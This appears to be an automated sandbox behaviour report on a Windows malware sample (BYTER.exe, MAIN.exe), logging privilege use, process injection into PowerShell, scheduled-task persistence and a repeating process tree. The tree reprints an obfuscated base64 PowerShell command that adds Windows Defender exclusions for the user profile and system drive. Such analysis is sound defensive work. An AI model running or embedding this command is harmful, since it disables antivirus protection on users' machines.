Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2112 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2320 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2112 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2112 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2112 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2112 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2112 wrote to memory of 3064 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2644 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2644 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2644 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2644 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2644 wrote to memory of 2568 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2644 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2644 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2644 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2644 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2568 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2568 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2568 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2568 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2568 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2568 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2568 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2568 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2568 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2516 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2516 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2516 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2516 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3044 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\WerFault.exe
PID 3044 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\WerFault.exe
PID 3044 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\WerFault.exe
PID 2456 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\WerFault.exe
PID 2456 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\WerFault.exe
PID 2456 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\MAIN.exe C:\Windows\system32\WerFault.exe
PID 2516 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2516 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2516 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2516 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\BYTER.exe
PID 2516 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2516 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2516 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2516 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2528 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2528 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2528 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2528 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2528 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\system32\conhost.exe
PID 2528 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\system32\conhost.exe
PID 2528 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\system32\conhost.exe
PID 2528 wrote to memory of 1052 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Windows\system32\conhost.exe
PID 2528 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe
PID 2528 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\BYTER.exe C:\Users\Admin\AppData\Local\Temp\MAIN.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3044 -s 564

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2456 -s 564

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-974993620-1938430478-38908114-385171956-1942359032166037379948395595-2097600350"

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

